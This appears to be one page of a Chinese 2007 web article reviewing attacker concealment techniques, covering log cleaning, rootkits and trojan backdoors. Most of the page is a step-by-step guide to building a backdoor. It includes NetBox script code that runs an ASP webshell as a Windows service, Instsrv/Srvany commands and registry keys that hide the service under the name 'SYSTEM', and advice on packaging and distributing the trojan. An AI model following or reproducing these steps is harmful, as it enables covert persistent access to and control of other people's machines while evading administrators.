知己知彼 2007年网络安全技术发展分析(6)

　  5、隐藏技术及其新发展

　　攻击者在完成其攻击目标后，通常会采取隐藏技术来消除攻击留下的蛛丝马迹，避免被系统管理员发现，同时还会尽量保留隐蔽的通道，使其以后还能轻易的重新进入目标系统。隐藏技术主要包括日志清理、内核套件、安装后门等。

　　第1种，日志清理。日志清理主要对系统日志中攻击者留下的访问记录进行清除，从而有效地抹除自己的动踪迹。Unix平台下较常用的日志清理工具包括zap、wzap、wted 和remove。攻击者通常在获得特权用户访问权后会安装一些后门工具，以便轻易地重新进入或远程控制该主机，著名的后门工具包括BO、netbus和称为“瑞士军刀”的netcat等；攻击者还可对系统程序进行特洛伊木马化，使其隐藏攻击者留下的程序、服务等。

　　第2种，内核套件。内核套件则直接控制

操作系统内核，提供给攻击者一个完整的隐藏自身的工具包，著名的有knark for Linux、Linux Root Kit 及rootkit。

　　第3种，安装木马后门。木马的危害性在于它对电脑系统强大的控制和破坏能力，窃取密码、控制系统操作、进行文件操作等等，一般的木马都有客户端和服务器端两个执行程序，其中客户端是用于攻击者远程控制植入木马的机器，服务器端程序即是木马程序。木马在被植入攻击主机后，它一般会通过一定的方式把入侵主机的信息，如主机的IP地址、木马植入的端口等发送给攻击者，这样攻击者有这些信息才能够与木马里应外合控制攻击主机。本文将通过网络盒子NetBox做一个木马，它可以方便的将ASP等脚本编译成为独立运行的执行程序，完全不用考虑平台兼容性要求。步骤如下：

　　第1步：创建一个NetBox应用。创建一个空的目录，假设是c:\web；同时，在目录中创建一个文件，命名为main.box，其内容为：

Dim httpd 　　'------------设置在服务中运行的名称，可适当修改进行隐藏--------------------- 　　Shell.Service.RunService "NBWeb", "NetBox Web Server", "NetBox Http Server Sample" 　　'---------------------- 设置服务器启动--------------------- 　　Sub OnServiceStart() 　　  Set httpd = CreateObject("NetBox.HttpServer") 　　'-------以下设置浏览端口，可修改为其他参数，或更改wwwroot目录---- 　　  If httpd.Create("", 8080) = 0 Then 　　  Set host = httpd.AddHost("", "\wwwroot") 　　  host.EnableScript = true 　　  host.AddDefault "default.asp" 　　  host.AddDefault "default.htm" 　　  httpd.Start 　　  else 　　  Shell.Quit 0 　　  end if 　　End Sub 　　Sub OnServiceStop() 　　  httpd.Close 　　End Sub 　　Sub OnServicePause() 　　  httpd.Stop 　　End Sub 　　Sub OnServiceResume() 　　  httpd.Start 　　End Sub

　　第2步：设置木马运行环境。在c:\web目录中再创建一个子目录wwwroot，并将我们所需要的ASP木马文件全部复制到wwwroot 中，这里选用的是海阳顶端ASP木马。此时，ASP运行环境应该已经准备好了。为了运行新建的NetBox 应用，必须确认8080端口没有被其他程序占用。双击main.box文件，就可以在窗口右下角看见NetBox的图标。此时，NetBox 已经正常运行了。现在，访问http://localhost:8080/测试ASP木马是否能正常运行。这种木马的好处是，不用担心有日志记录。但是现在它还远不是一个后门，只是提供了与IIS相当的功能

　　第3步：编译。执行“NetBox Deployment Wizard”，点击“选择文件夹”，找到刚才建立的目录C:\web，设置文件类型和输出文件名后，点“Build...（编译）”按钮，开始编译，就得到了编译成功的那个执行文件。因为这个例程是以服务方式创建的Web 服务器，所以可以在命令行下执行：myapp -install将应用安装成为服务，这样，系统无须登录便可以自动运行应用了。如果需要卸载服务，则可以在命令行下执行如下命令：myapp –remove。（myapp代表输出的应用文件名，如本例中的test），如图5所示。

NetBox Deployment Wizard

　　第4步：隐藏服务。要达到“神不知鬼不觉”的效果，首先需要把应用程序添加为服务，我们可以使用Windows提供的Instsrv.exe和Srvany.exe这两个小软件。在命令行下，先把Instsrv.exe把Srvany.exe注册为服务。格式为：INSTSRV 服务名 SRVANY的路径，如：“INSTSRV SYSTEM C:\WEB\SRVANY.EXE”。其中SYSTEM是为了便于隐藏服务名。

　　第5步：添加注册表键值。注册成功后，打开注册表如下键值：[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SYSTEM]。SYSTEM是刚才我们注册的服务名，在SYSTEM下面先建立一个项PARAMETERS，然后在这个项上建立一个键值APPLICATION，填上我们要执行的文件路径如C:\web\test.exe，就可以了。

　　第6步：启动服务。方法有两种，第一种是在图形界面，直接进入“管理工具”下的“服务”面板；另一种是在命令行下，启动命令为：“NET START SYSTEM”，停止命令为：“NET STOP SYSTEM”。如果要将这个服务删除，可以用如下命令：“SC DELETE SYSTEM”。

　　第7步：制作并发布木马。结合批处理和脚本把这个做成自解压文件，或者其他的上传方式，比如通过后台数据库备份上传后再修改密码。

　　值得注意的是，2007年木马技术发展迅猛，除了一些老牌木马，其他有特色的木马也让人头疼不已，例如管理型木马——ncph远程控制；国产木马新秀PCView 2007；五毒俱全的蜜蜂大盗；木马Erazer Lite；另类的远程控制工具JXWebSver等。这些木马隐藏技术的不断提高，也给用户带来了许多麻烦。

　　通过上面的详细分类，就可以对本年度的攻击技术情况有了一个十分直观的认识。下面，我们通过典型的案例进行点评。

[上一页]　[1]　[2]　[3]　[4]　[5]　[6]　[7]　[下一页]

本文导航:
·2007年网络攻击的发展趋势 ·探测技术和攻击测试平台的发展 ·攻击测试平台的新发展 ·2007年网络攻击和隐藏技术发展趋势		·拒绝服务攻击技术的发展 ·隐藏技术及其新发展 ·实例分析